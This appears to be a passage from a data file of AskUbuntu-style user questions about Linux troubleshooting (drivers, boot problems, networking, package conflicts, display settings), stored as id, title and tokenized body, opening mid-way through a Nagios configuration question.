-- using short name jun 4 11:20:01 backups sm-msp-queue [ 10678 ] : my unqualified host name ( backups ) unknown ; sleeping for retry jun 4 11:21:01 backups sm-msp-queue [ 10678 ] : unable to qualify my own domain name ( backups ) -- using short name i 'm at the last step , and i want to finish this nagios core ! : ) host definition ( this host has the disk almost full , and it is in hard state but non notification ) : define host { use generic-host ; name of host template to use host_name posta alias server posta esa address 10.10.2.102 parents xen1 , xen2 icon_image redhat.png statusmap_image redhat.gd2 } service definition : define service { use generic-service host_name xen1 , maestro , xen2 , posta , nas002 , serv2 , esasrvmi02 , esaubuntumi service_description disk space check_command ssh_all_disks ! 10 % ! 5 % } notification is allowed for the contact definition you gave , but is it also allowed at the the service level ? sorry , but i do n't understand this thing ! : (
476641	how can i get the name of the current terminal from command-line ?	is there a possibility to get the type of terminal with a command ? if i 'm using gnome-terminal , the output should be gnome-terminal or something similar . it would be also nice to get the version of the terminal . update ps -aux | grep `ps -p $ $ -o ppid=` will output something like this : user 4239 0.0 0.7 292708 15744 pts/8 sl 11:39 0:02 xfce4-terminal user 4800 0.0 0.0 6176 820 pts/0 s+ 12:23 0:00 grep -- color=auto 4239 this will also work with xterm , but how do i get only the name ( xfce4-terminal in this case ) ?
476644	installation on asus zenbook ux301la	i am afraid i messed up things pretty badly while trying to install ubuntu 14.04 or mint 17 on a brand new asus zenbook ux301la . the situation is : i am pretty sure that i have destroyed windows8 ( that 's fine ) i think i have installed linux somehow i ca n't boot for some reasons i do not understand , and boot repair did not solve the problem either . details are here : http : //paste2.org/vlk6tdxn i tried many bios configurations . at the moment : - secure boot is disabled - csm is enabled - not sure of what to do with sata settings of the 2 ssd ( 256gb each ) : should i leave raid on , at least during installation , or may i choose ahci ? the important thing ( which is hopefully simplifying the situation ) is that i do not need the preserve partitions/data . rather , i do n't need windows and i am willing to erase everything ( provided there are no problems in doing that , with this asus ) and just install linux on a good old /dev/sda , instead of all this mess of partitions and containers which i do n't undestand ( see http : //paste2.org/vlk6tdxn ) . how to do this apparently simple thing ? i had never experienced such a painful installation , probably because i had never had such a new pc with efi , win8 and this sort of stuff . hope that you can help me because at the moment the pc boots only with a live distro and i am in panic . please , help ! ! thanks , andrea
476646	launch a vm on ubuntu	on ubuntu 14.04 , i installed virtualbox on which i have created 2 ubuntu virtual machines . does ubuntu provide a way to launch the virtual machine i want at a particual moment ? is there any solution for this problem by developing a .sh script for example or using any other programming language ?
476652	ubuntu 14.04 does n't detect bt devices	i have a lenovo b5400 with windows 8 and ubuntu 14.04 in dual boot . my bluetooth works well under win but with ubuntu it is not able to detect any device . hcitool scan does a scan but does n't detect anything hciconfig -- all : bd address : a4 : db:30:9e:43 : bb acl mtu : 820:8 sco mtu : 255:16 up running pscan iscan rx bytes:901 acl:0 sco:0 events:42 errors:0 tx bytes:994 acl:0 sco:0 commands:42 errors:0 features : 0xff 0xff 0xff 0xfe 0xdb 0xff 0x7b 0x87 packet type : dm1 dm3 dm5 dh1 dh3 dh5 hv1 hv2 hv3 link policy : rswitch hold sniff park link mode : slave accept name : 'ubuntu-0' class : 0x700100 service classes : object transfer , audio , telephony device class : computer , uncategorized hci version : 4.0 ( 0x6 ) revision : 0xb lmp version : 4.0 ( 0x6 ) subversion : 0x8723 manufacturer : realtek semiconductor corporation ( 93 ) rfkill list 1 : tpacpi_bluetooth_sw : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no do you see any anomalies ?
476653	how to install gdb and valgrind in ubuntu	if i type gdb on my terminal prompt , gdb opens up , but when i run commands like next , wierd stuff shows up like _libc_start_main ( main=0x40060d < main > , argc=1 , argv=0x7fffffffdfc8 , init= < optimized out > , fini= < optimized out > , rtld_fini= < optimized out > , stack_end=0x7fffffffdfb8 ) at libc-start.c:321 321 libc-start.c : no such file or directory . same story with valgrind , could somebody tell me how to install gdb . i am a noob in ubuntu , so could you make the solution a bit more detailed because i dont know any terminal commands
476655	ubuntu 14.04lts graphics driver : how do i revert to my former set up when i have no display ?	i installed ubuntu 14.04lts on my pc which has an asus p5s800-vm motherboard & a nvidia 5200 ? graphics card . the system was running fine until i saw that i was running a freeware driver for the nvidia card & changed it to the proprietry driver in the update utility . the new driver loaded & everything was ok for about 5 minutes & then a window came up saying that the graphics was running on reduced quality & it asked what to do . i told it to stay as it was & then i lost the display . how do i revert to my former set up when i have no display ?
476662	how to install packages from launchpad which are not in a ppa ?	launchapad contains a wealth of packages that are not usable ( they seem to be in source form or something ) . for example , by searching for a `` ndoc ubuntu '' on google , i fell on the page https : //launchpad.net/ubuntu/+source/ndoc which basically has no description , no documentation , no readme , no .deb , no nothing . clicking on the `` code '' tab shows different bzr branches for trusty , saucy , etc . but no .deb package . how can i get a .deb package for this software , or otherwise install it ? this package is just an example , i frequently encounter such non-installable packages on launchpad . edit : is there a specific tool or configuration to use for launchpad packages that downloads , patches and builds everything including dependencies , or are we supposed to use the standard bzr clone , ./configure , manually install all build dependencies , then make , sudo make install ?
476664	can not change backlight brightness ubuntu 14.04	this morning i found that i can not change the brightness of my dell xps 13 laptop 's display anymore . i tried the following to change the brightness use keyboard brightness keys run the commands shown below boot with kernel option acpi_backlight=vendor . this resulted in a dell_something folder being present in the /sys/class/backlight folder . changing the brightness file in that folder does not help . add 'intel_backlight ' to xorg.conf set `` load legacy option rom '' bios option to enabled and `` secure boot '' to disabled boot with kernel option i915.disable-pch_pwm=0 boot from a fresh ubuntu 12.04 usb stick installation . i can still not control the brightness . this is strange as the laptop came preinstalled with 12.04 . maybe this a hardware problem ? install latest intel video driver any ideas why this broke suddendly ? i 've upgraded from 12.04 to 14.04 in april and till yesterday the brightness keys were working fine . thanks ! echo 100 > /sys/class/backlight/intel_backlight/brightness echo 100 > /sys/class/backlight/acpi_video0/brightness
476670	ftp vsftpd error to login	i create user and group , then i login with filezilla it show 500 oops : vsftpd : refusing to run with writable root inside chroot ( ) . i think about permissions but i do n't know why or how to config something in the vsftpd .
476671	how to log in as a root from tightvnc	i followed how to install apache tomcat on ubuntu 12.04 and installed vnc server on my remote machine , but now when i log in through tightvnc it logs in as a vnc user . how do i instead log in as root ? note : i am using ubuntu 14.04 ( trusty tahr ) .
476672	change language of guest session to something else but the system wide language	how can i permanently change the language of lubuntu 's guest account ? i have installed lubuntu 14.04 in german , but for my collegues who use the guest account from time to time , english would be much more helpful .
476673	how to set my downloads to automatically save in my downloads folder ?	i can not find the way to set download folder as the default folder for all my downloads and i can not find them after downloading .
476675	mouse shortcut for setting 'always on top ' a window	i use very often the 'always on top ' feature over the windows to see two windows at a time . but the process of right clic + select always on top is not as fast as i would like to . i would like to enable a mouse shortcut for this action . for example , with middle click on the title bar would be great , but unity tweak tool does n't provide this option for the action middle click on title bar .
476676	combining .rar extraction	i 've recently downloaded 7 .rar files which needs to get extracted and to output only one file . how do i to make them extract only one output and to do not extract 7 files , please ? thanks in advance !
476679	how to update software using terminal	i use youtube-dl command for downloading the videos from youtube . but now it is not working . so i thought it need to be update . i used `` youtube-dl -u '' to update , but they show the following message so what should now i do ?
476681	primus : fatal : bumblebee daemon reported : error : could not load gpu driver	i recently installed ubuntu 14.04 and then installed bumblebee following the instructions on ubuntu bumblebee wiki ( where they said that primusrun is better than optirun for version= > 13.10 ) but when i rebooted and tried to run primusrun with any applications ( except google-chrome and firefox ) the following error came ( and comes ) primus : fatal : bumblebee daemon reported : error : could not load gpu driver and surprisingly when i check the status of my nvidia driver , it gets on after running for example primusrun clementine sudo cat /proc/acpi/bbswitch gives the following 0000:01:00.0 on then , in order to avoid powerloss , i have to switch it off by bbswitch note : i was able to turn it off using bbswitch only after i set driver=nouveau in the /etc/bumblebee/bumblebee.conf file and rebooted it .
476683	ata3 errormessages	i 'm very new to ubuntu , and yesterday i managed to do something incredibly stupid . while i was tweaking gnome , i wanted to use compizconfig , which i had from when i was running unity . since i could n't understand , why it was n't responding i turned to google and found a page , where it was recommended that i use `` compizconfig -- replace '' in terminal . i did that , and then the interface dissapeared exept the terminal , which at somepoint froze . then i did a hard reboot . since then every time i enter ctrl+alt+f1 i get the following error message running over and over again : ata3 : exception emask 0x10 sact 0x0 serr 0x4000000 action 0xe frozen ata3 : irq_stat 0x00000040 , connection status changed ata3 : serror : { devexch } sometimes it changes a bit to the following before switching back : ata3 : exception emask 0x10 sact 0x0 serr 0x4040000 action 0xe frozen ata3 : irq_stat 0x00000040 , connection status changed ata3 : serror : { commwake devexch } i have tried the reinstalling ubuntu gnome , and also downloaded gnome disks and ran a smart test on my drive , which came out with a disk ok . i am using ubuntu gnome 14.04 on a lenovo 570g . i am not experiencing any problems besides those error messages ( yet ... ) .
476684	what is db_load ?	i saw this line on here . what is db_load ? **is that kind of database like mysql and oracle ** ? # db_load -t -t hash -f vusers.txt vsftpd-virtual-user.db
476689	how to create desktop shortcuts	how to create desktop short cuts as the different user logins ?
476693	transparency of terminal	how to make terminal transparent in ubuntu 14.04 . actually i want to make my ubuntu terminal transparent but the solution given for the same question is not applicable because the given thing that to go to edit- > profile preferences- > background tab . but the problem is there is no background tab there . so what to do ?
476694	monitor resolution driving me insane	i 'm having on ongoing issue setting up monitor resolution in ubuntu . it 's really starting to annoy me as i 've been trying to switch to ubuntu on and off for months and i always end up back with windows due to this issue . i 'm trying to setup dual monitors . both screens are aoc one with a default resolution on 1920x1080 and the other 1680x1050 . i 'm running an old nvidia 8800gt and i 've got the correct driver installed alongside nvidia x server . the monitor with 1680x1050 is recognised and at the correct resolution , however the 2nd monitor is showing as `` unknown '' and the highest resolution i can select is 1360x768 . i appreciate this has been asked before , however i 've spent hours and hours attempting the potential solutions , including trying to add resolutions through xrandr and also modifying xorg.config , to no avail . if anyone can shed any light on this i would really appreciate it ?
476695	how to move a selcection of files into a new folder via the right click menu ?	i recently switch from osx to xubuntu 14.04 and i 'm loving my new found freedom . for the most part i 've managed to customize my linux operating system to my needs and likes . but theres one feature i 'm missing the most . i need to toss a bunch of items in a folder really fast , since i am working with lots of images and text files . in os x there was a nifty shortcut that manages the operation in one fell swoop so you do n't have to make a folder and then take further action to populate it . all i needed to is to select the items i want in the finder ( file manager ) , right-click on them to bring up os x 's contextual menu , and choose the first option : new folder with selection . the finder will then create a new folder with those items stored safely inside , removing at least one step from the process for you automatically . super easy ! now i was wondering how can i do this in linux ? or most importantly in xubuntu ? any help would be greatly appreciated !
476696	additional drivers download nvidia fx5200 didn`t work	i 've installed ubuntu 14.04 . my graphics card is an nvidia fx5200 . the download out of software update-additional drivers did not work after restart i get only a black screen and mouse pointer . repeating the process is not effective .
476697	how to assign individual leds for different layouts ?	using xubuntu 14.04 trusty tahr . my keyboard config is : xkbmodel= '' logiik '' xkblayout= '' us , ru , ua '' xkbvariant= '' , ruu , '' xkboptions= '' grp : alt_shift_toggle , lv3 : ralt_switch , grp_led : scroll , misc : typo , compose : rwin '' xkboptions= '' terminate : ctrl_alt_bksp '' now , when i switch layout of my keyboard to ru or ua languages , my scroll led is turning on . i want to assign a different leds to each layout . could you help me , please ?
476699	ubuntu app development : u1db results not as listview just one special result	i have started with an ubuntu app ( qml ) with a u1db-database-integration . i could add new data and i can show all data with a listview ( over query and index ) . but how can i get just one special dataset - for example the dataset with the id = 1 ? there are a lot of examples for the listview ( e.g . http : //developer.ubuntu.com/api/qml/sdk-1.0/u1db/ ) . do you know examples for other special queries and how to get special data from the database and how to use it ? thank you !
476700	how to disable acces to subdirectories and files	i have a situation where i would give a path and the file dialog box opens with the path given , but the user should not have access to change to any other paths from the file dialog box and as well as he should not have access to subdirectories of the directories displayed in the file dialog box , this is the issue am facing now . any help is appreciated , thanks in advance
476701	how do i install fogger ?	when i try to install foggger with these instructions it does n't work : how to install fogger ? . terminal says it ca n't find the package . what do i do ?
476702	get the openstack cinder volume size through python bindings	can any one help me out to get the openstack cinder volume size through python bindings . i have list of cinder volumes that are extracted by calling cinder_client_instance.volumes.list ( ) method . now i want to know the size of the volume . how i can get the volume size ?
476708	can not run the terminal : `` not such file or directory '' and `` hostname has changed ''	my problem is : i ca n't use the terminal in xubuntu 14.04 . if i launch it , this error is appearing : grep : /opt/aster113/etc/codeaster/asrun : no such file or directory hostname has changed , running autoconfig scripts for code-aster grep : /opt/aster113/etc/codeaster/asrun : no such file or directory autoconfigure code-aster installation aster root : /opt/aster113 old hostname : new hostname : virtual processing /opt/aster113/etc/codeaster/asrun cp : can not stat '/opt/aster113/etc/codeaster/asrun ' : no such file or directory /opt/caelinux/autoconfigaster.sh : line 35 : //opt/aster113/etc/codeaster/asrun : permission denied processing /opt/aster113/etc/codeaster/astkrc/config_serveurs processing /opt/aster113/etc/codeaster/aster-mpihosts cp : can not stat '/opt/aster113/etc/codeaster/mpi_hostfile ' : no such file or directory /opt/caelinux/autoconfigaster.sh : line 51 : //opt/aster113/etc/codeaster/mpi_hostfile : permission denied this command-line window remains open just for a moment , it 's not possible to read the error when trying to open the terminal . this code above is what i 've read from a screen-shot of the recorded video of the operation . a bit of history : i 'm using caelinux 2013 . the distro was given with xubuntu 12.04 and i 've updated till 14.10 . with xubuntu 14.10 i was able to use the terminal , but i should have done something wrong somewhere . maybe with the `` users and groups '' application ( i 've changed the account type from customized to administrator , but i do n't know how was the `` customized '' set , it was just always like that after the installation ) last but not least , i 'm new in the linux word . thanks a lot to anyone who 'll help
476709	pptpd ubuntu server 14.04 no internet	i have recently hired a vps with ubuntu 14.04 server on it . i tried to setup a vpn server with pptpd . i used this guide : guide . i can successfully connect to my vpn with my windows client , but sadly i do n't have any internet connection . neither with website names , nor with the direct ip adress . could someone help me setting it up ? thank you .
476713	installing boost ( libboost1.55-all-dev ) and ros ( ros-groovy-desktop )	i 'm trying to install the latest version of boost ( libboost1.55-all-dev ) alonogside with ros ( ros-groovy-desktop ) , but i ca n't get this to work . i already switched from apt-get install to aptitude install , but somehow , i can only install either package and not both ; aptitude install always proposes to remove the other package . starting from the situation where i installed libboost1.55-all-dev , here 's what i get when i try and install ros-groovy-desktop : user @ ubuntu : ~ $ sudo aptitude install ros-groovy-desktop the following new packages will be installed : ( gigantic package list , removed for clarity ) the following packages have unmet dependencies : libboost-serialization1.55-dev : conflicts : libboost-serialization1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-wave1.55-dev : conflicts : libboost-wave1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-filesystem1.55-dev : conflicts : libboost-filesystem1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-test1.55-dev : conflicts : libboost-test1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-thread1.55-dev : conflicts : libboost-thread1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-regex1.55-dev : conflicts : libboost-regex1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-program-options1.55-dev : conflicts : libboost-program-options1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-graph-parallel1.55-dev : conflicts : libboost-graph-parallel1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-graph1.55-dev : conflicts : libboost-graph1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-mpi1.55-dev : conflicts : libboost-mpi1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-date-time1.55-dev : conflicts : libboost-date-time1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost1.55-dev : conflicts : libboost1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-iostreams1.55-dev : conflicts : libboost-iostreams1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-math1.55-dev : conflicts : libboost-math1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-python1.55-dev : conflicts : libboost-python1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-signals1.55-dev : conflicts : libboost-signals1.46-dev but 1.46.1-7ubuntu3 is to be installed . libboost-system1.55-dev : conflicts : libboost-system1.46-dev but 1.46.1-7ubuntu3 is to be installed . it then gives two possible solutions for 'resolving ' this dependency : either do nothing ( i.e. , keep everything at their current version which is [ not installed ] ) , or remove all packages related to libboost1.55 . however , i really need the new boost version for the algorithms i 'm using ... any help ?
476715	pgp key version , does it matter ?	after reading about google 's attempt for end-to-end encryption with pgp keys , i noticed in their faq a section about exporting a key generated by their extension for use elsewhere . they say it 's possible but that it requires gnupg 2.1+ wherever you use it . i had been running 12.04 lts at the time i generated mine and so my version of gpg was 1.4.x , does that mean i ca n't import my key into a tool that uses 2.x ?
476716	uninstall spotify ?	i was under the assumption it would work with wine , but was incorrect . i would like to completely remove it but everything i 've seen on the internet has n't helped in the slightest .
476717	problems with printer ricoh in ubuntu 12.04	i have a trouble when i use a ricoh 2500 and ricoh 2000 , in ubuntu 12.04 . when i try to print a document with an picture ( like a logo ) and put the orientation to landscape , do not prints the logo , just the text . but if i change the orientation to portrait works very well . and more if i export the doc to a pdf and send to printer in landscape mode with the evince not work , but with adobe reader works . one more thing , i tryed with all possible drivers . it 's a very specific problem but if anyone have a idea please help me . thanks and sorry about my english !
476720	host is unreacheble with static networking configuration via /etc/network/interfaces while gui networkmanager is ok	i have some trouble setting-up the network interface using the static ip configuration . i run ubuntu 12.04 kernel 3.11.0-22 with the back-ports enabled . i followed these instructions from help.ubuntu.com but there seems to exist some conflict between the gui approach ( networkmanager ) and the command line approach . $ sudo nano /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.1.1.50 gateway 10.1.1.10 netmask 255.255.255.0 dns-nameservers 192.168.3.45 192.168.8.10 $ sudo /etc/init.d/networking restart i than try to ping for example google.com ping -c 3 www.google.com the response is that the host is unreachable . the icon on the top right of the desktop says : wired network disconnected . if i work using the gui approach ( edit connections and so on ... ) all works great . can same one explain to me where i wrong ? $ ifconfig eth0 eth0 link encap : ethernet hwaddr 90 : e6 : ba:07:4a:77 inet addr:10.1.1.50 bcast:10.1.1.255 mask:255.255.255.0 inet6 addr : fe80 : :92e6 : baff : fe07:4a77/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:39619 errors:0 dropped:0 overruns:0 frame:0 tx packets:18520 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:19030895 ( 19.0 mb ) tx bytes:2768769 ( 2.7 mb ) $ netstat -rn kernel ip routing table destination gateway genmask flags mss window irtt iface 10.1.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 eth0
476723	digital pen or smart pen which has support for ubuntu 14.04	i am looking for a digital pen to take handwritten notes which can be later transferred to computer to edit or save . all the available digital pen comes with their own software and they support windows and mac only . i do not want to use windows to use the digital pen . please suggest me a digital pen which supports ubuntu with some tweaks or third party apps .
476724	how to integrate multiple machines as one system ?	as the title . what i wish to get from this is : 1. the four nodes works like only one computer , i.e. , one root , one system , one bash , one updates for all machines . 2. once a user is logged in , it is able to access the harddrive and cores in all nodes . here are more information about my situation : we have four nodes ( ubuntu installed ) , each of them have multiple cores . so far all of them are identical , but maybe later on more nodes will be added with different hardwares . we usually use these nodes to conduction scientific computations . at the moment each of them are working individually . there are about 10 people using these resources . i have learned by googling that single system image ( ssi ) can be one of the solutions . however , the packages listed in the wiki page seem not updating for quite a while ( e.g. , the latest release of openssi was 2010 ) and there are not so much step-by-step tutorials for the setup on the web , which give me a feeling that this is an old-fashioned solution . so if this could be a good solution based on your experience , which software on the package list or tutorials on the web could make a go as a start ? currently there is a cluster in our uni using batch system to manage all the runs . but for us it may not be necessary to do it so far , as there are only few users and limited simulation runs . considering the potential of having more users in the following two years , and the possible hardware upgrade , do you think installing batch system would be the ultimate ( or the convinent ) solution ? at least all the abovementioned criteras can be satisfied ? your reply is appreciated .
476725	error pop ups appear everytime i log into ubuntu	everytime i log into ubuntu 14.04 , i get a couple of error pop ups . every single time . it appears also sometimes a third on shortly after , for example after opening the browser . how can i find out the reason for this pop-ups ? and more importantly , how can i stop them ? update : just to be clear , i do not want to `` hide '' message warnings . i want to find out the reason why this pop ups come , and how i could possibly fix them , as i am sure they are symptomatic of an underlying problem somewhere .
476729	getting rid of dialog box when android phone connected	since upgrading from 12.04 to 14.04 , whenever i connect my android galaxy sii to my laptop via usb to charge , i get a dialog box that says unable to mount samsung android unable to open mtp device ' [ usb:002,021 ] ' if i want to mount it , i select the mounting option on the phone as usual , and it mounts fine as a usb mass storage device . i do n't know why ubuntu is trying to mount the device before it switches to usb mass storage mode . is there a way to disable this automounting , or at least to disable the dialog boxes when it fails ? ( i still want other usb devices to be mounted when inserted , as usual . ) in other words , i want the sane 12.04 behaviour back .
476733	error showing : unable to launch `` path= ... '' x session -- - , falling back to default session	when i logged in after successfully installing jdk 1.8.0_05 on ubuntu 14.04 it says : : unable to launch '' path=/usr/local/sbin ... ... x session -- - path=/usr/local/bin : ... ... . : /usr/lib/java/jdk1.8.0_05/bin not found ; falling back to default session . and then shows empty desktop . although i was able to login using ubuntu 14.04 lts ubuntu tty1 using ctrl+alt+f1 . please suggest what to do .
476734	clonezilla vs. fog on ubuntu	i am hopeful that someone in this community will be able to help me . i am stumbling my way through my first experience with any form of linux computing . since 2003 i have used windows and symantec 's ghost software to image laptops at my place of work . this year we got new computers with the new uefi bios , and we changed over to windows 8.1 . ghost , no longer being supported , does not work in windows 8 . i decided it was time to get an updated mass imaging solution , one that people are actually using and updating . i tried clonezilla live on a flash drive , created the image , and pushed it back to a different machine with no problem whatsoever . the next step was to get something that can do mass imaging , since we need to do 900 of these laptops . i installed ubuntu with fog and created the image and pushed it back , only to have it not be bootable . i get a recovery error is [ in ? ? ? ] windows which i think means it has something to do with the image process not properly handling the boot partition . the questions is why if both clonezilla and fog use partclone 0.2.69 does one work and one does not ? is there anyone out there who knows the details behind the scenes on how this software works ? with my limited experience i do n't even know how to troubleshoot what 's different .
476736	how do i access a windows 7 p2p network with ubuntu 14.04	i am new to ubuntu software and would like to know how to connect to a win 7 professional ( 32 bit ) network from ubuntu 14.04 64 bit . i have two other computers on the lan with win 7 sp1 . the pc on which i have 14.04 is a stand alone pc which at this time can connect to the internet with no problem . thanks in advance for your help . jay
476738	install proprietary drivers 14.04 nvidia ( steam segmentation issue )	recently , i finally got the official drivers for my nvidia 560 ti card installed on ubuntu 14.04 ( hooray ) however i started looking into installing steam and i 'm getting segmentation errors when i try to run the software . i tried installing 32-bit libs and it seemed like they were n't available or they were already installed . upon further investigation , i found that a solution is to install the proprietary drivers , install steam then switch back to the other drivers . i 'm not really sure what `` proprietary drivers '' are in all honesty . has anyone gone through this process that could provide some insight here ? ( i installed the official 64-bit driver from the nvidia site for my 560 ti just for reference . and the ubuntu version installed is 64-bit as well ) update : this is the error text i get when trying to run steam after installing it via the ubuntu store . running steam on ubuntu 14.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1401381906_client ) /home/dbrewer/.steam/steam.sh : line 755 : 3943 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' mv : can not stat ‘/home/dbrewer/.steam/registry.vdf’ : no such file or directory installing bootstrap /home/dbrewer/.steam/bootstrap.tar.xz reset complete ! restarting steam by request ... running steam on ubuntu 14.04 64-bit steam_runtime has been set by the user to : /home/dbrewer/.steam/ubuntu12_32/steam-runtime installing breakpad exception handler for appid ( steam ) /version ( 1401381906_client ) /home/dbrewer/.steam/steam.sh : line 755 : 4066 segmentation fault ( core dumped ) $ steam_debugger `` $ steamroot/ $ platform/ $ steamexe '' `` $ @ '' what i get when i run `` steam -- reset '' mv : can not stat ‘/home/dbrewer/.steam/registry.vdf’ : no such file or directory installing bootstrap /home/dbrewer/.steam/bootstrap.tar.xz reset complete !
476740	is my laptop hardware sufficient to install & run ubuntu as a secondary os smoothly ?	i have a asus laptop which is running windows 7 . its a first gen core i3 with a 500gb hdd & 6gb of ram . i would want to install ubuntu as a secondary os on my laptop . i asked a friend of mine whether my laptop can run ubuntu smoothly when installed . he told me that my laptop hardware spec is n't good enough & my laptop will experience performance problems if i install ubuntu . i just want to get a second opinion . will it really affect my laptop performance if i do install ubuntu ?
476741	code highlight for libreoffice 4.0 ?	any possible way to insert code/programming language ( highlighted ) in libreoffice 4.0 writer ?
476742	create a bootable usb drive for windows	i 'm trying to make a bootable usb for windows 7 in ubuntu ( 14.04 ) any ideas on how to do this ? i 've been searching but all of the other questions are talking about creating an ubuntu usb . thanks in advance
476745	blank desktop after login	today my 14.04 updated itself not requiring a reboot . after a while i rebooted because of other reasons and then i was pleasantly surprised by a blank screen . i have tried everything i could think about including reinstalled compiz , unity , ubuntu-desktop , xorg reinstalled and then removed the nvidia driver so far nothing has worked . except for one little thing : my cairo-dock is showing . and that 's all . i tried with unity does n't load , no launcher , no dash appears , but none of the answers there helped me . i also tried removing my ~/.xauthority file and it still does n't work . does anybody know what else i could try ? update : sudo dpkg-reconfigure xserver-xorg sudo service lightdm stop sudo service lightdm start when i run that code and then login again the icons on the desktop are displayed but the menu and the launcher are still not there . also , when i try to run an application from ctrl + alt + f1 such as dconf reset -f /org/compiz/ it says can not autolaunch d-bus without x11 $ display i can only run applications with export display=:0 update 2 : i 've reinstalled my os and everything went fine until it updated again . after the update , unity is once again unusable . update 3 : i ran sudo apt-get dist-upgrade and compiz was updated . now the desktop icons are displayed but nothing more . also , after a reboot i got a system error regarding xorg . it somehow disappeared before i could see what generated the error . i tried to reboot again in order to see the error again but it did n't appear anymore .
476752	modify the list of programs presented to open images in evolution ?	in evolution , i can open a pull down menu to select an application for opening attached image files . since i have gimp installed , it occurs on this list . how can i remove this option from the drop down menu ( i never want to run gimp in this way , but i sometimes accidentially hit it ) ? i 've looked through edit- > preferences but did n't see anything that looks like i can configure what applications are presented .
476754	bad sound quality	my sound quality is very bad in ubuntu 14.04 . how can i solved it ? my laptop model is dell vostro 5560 .
476755	broken apt-get - now ca n't install or meove anything	background : running kubuntu 14.04 , using kdm . i have a brother mfc7280n , and installed the brscan2 package . nevertheless i have never been able to scan , since the device is never found . i removed ( i thought ) brscan2 in hopes of reinstalling . i had installed kompozer , and had to remove it when it started to display funky video . i have tried to reinstall it but without success . i have n't edited any config files , except to add a repository for kompozer ( failed ) , or done anything other than run apt-get and the software center . that is , i have n't tried any strange ( to me ) commands to install , remove , or modify the installed software . i did try to install kompozer from a .deb file and also from two tarballs . now i ca n't install or remove any software using apt-get or the ubuntu software center . here 's an example : < < root @ lex : /home/bill # apt-get remove brscan2 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : kompozer : i386 : depends : libatk1.0-0 : i386 ( > = 1.9.0 ) but it is not going to be installed depends : libcairo2 : i386 ( > = 1.0.2-2 ) but it is not going to be installed depends : libgtk2.0-0 : i386 ( > = 2.8.0 ) but it is not going to be installed depends : libidl0 : i386 but it is not going to be installed depends : libpango1.0-0 : i386 ( > = 1.12.3 ) but it is not going to be installed depends : libxft2 : i386 ( > 2.1.1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . > this is so strange that i do n't have any notion of what to make of it . so i need some expert guidance . many thanks !
476756	is it possible to limit the user from writing data ?	i have created different users and set their home directories to particular folders . i have limited the users ' access other than their directories . how could i limit users from writing data ?
476760	plank has duplicate icons for added launchers in lxde	i am on lubuntu and just installed plank for a dock . i have figured out how to remove launchers by dragging and dropping and the go [ poof ] in a cloud , and i figured out how to add by right clicking and selecting `` keep in dock '' the problem is , certain apps have duplicate icons . that is to say , after i added chrome , it stays in the dock when i close it , but then when i click it to open it , another icon for chrome appears at the bottom . so , one chrome icon is the app that is running , highlighted with a blue dot underneath , and another is the one that is the app launcher . also , weirdly , the icon that is representing the active window has a different icon . the one that is the launcher is the nice , shiny square icon similar to moku or faenza . the icon that is representing the active app is low res , blurry , and just the standard chrome circle . the double icon problem also happens for firefox , which was already in the dock . firefox thankfully does not have the ugly icon problem though . that is unique to chrome . other launchers such as the pcmanfm one does n't duplicate , and neither does my terminal launcher . any help ? thanks !
476761	how do i open the preferences dialog in empathy under ubuntu 14.04 ?	i run empathy ( version 3.8.6 ) under gnome shell ( gnome 3.10 environment ) in ubuntu 14.04 . when i open it , i get the contact page but no menu is shown . i want to open the preferences dialog but i do n't see a way to get there . where is the menu ? how can i open the preferences dialog ?
476769	dual monitor - desktop falls off the screen slightly	i have a dual monitor setup where i have placed a 1280x1024 resolution monitor to the left and a 1920x1080 resolution monitor to the right . internally it looks like ubuntu ( 14.04 ) changes the total resolution to 3200x1080 . so because i have placed the smaller monitor left , where the desktop 's icons are oriented towards , the icons fall slightly off the screen . the 56 extra pixels ubuntu created at the bottom of my smaller monitor are filled with content , which obviously is n't visible . i have set `` scale all window contents to match '' to the smaller monitor , but that did n't change much . actually changing that setting does n't change anything visibly or at least that i could see . so how do i go about changing how ubuntu handles this ? or should i always keep the bigger monitor ( in height ) to the left as a rule of thumb ? added screenshot for clarity . for example file11 falls off the screen now .
476770	upstart : pipe the output of multiple commands	i try to detect if there is a network link ( cable plugged/unplugged ) in an upstart script ( ubuntu 12.04 ) . here the relevant part of my script ( which didndt work ) : script if [ /sbin/ethtool eth0 | /bin/grep `` link detected : yes '' > /dev/null ] ; then exec prog1 else exec prog2 fi end script ( try to start prog1 if there is a link otherwise prog2 . ) how to fix that ?
476774	can i download genuine ubuntu from www.ubuntu.com ?	can i download the genuine version of ubuntu from http : //ubuntu.com ? or do i need to make it genuine after downloading just like microsoft windows ?
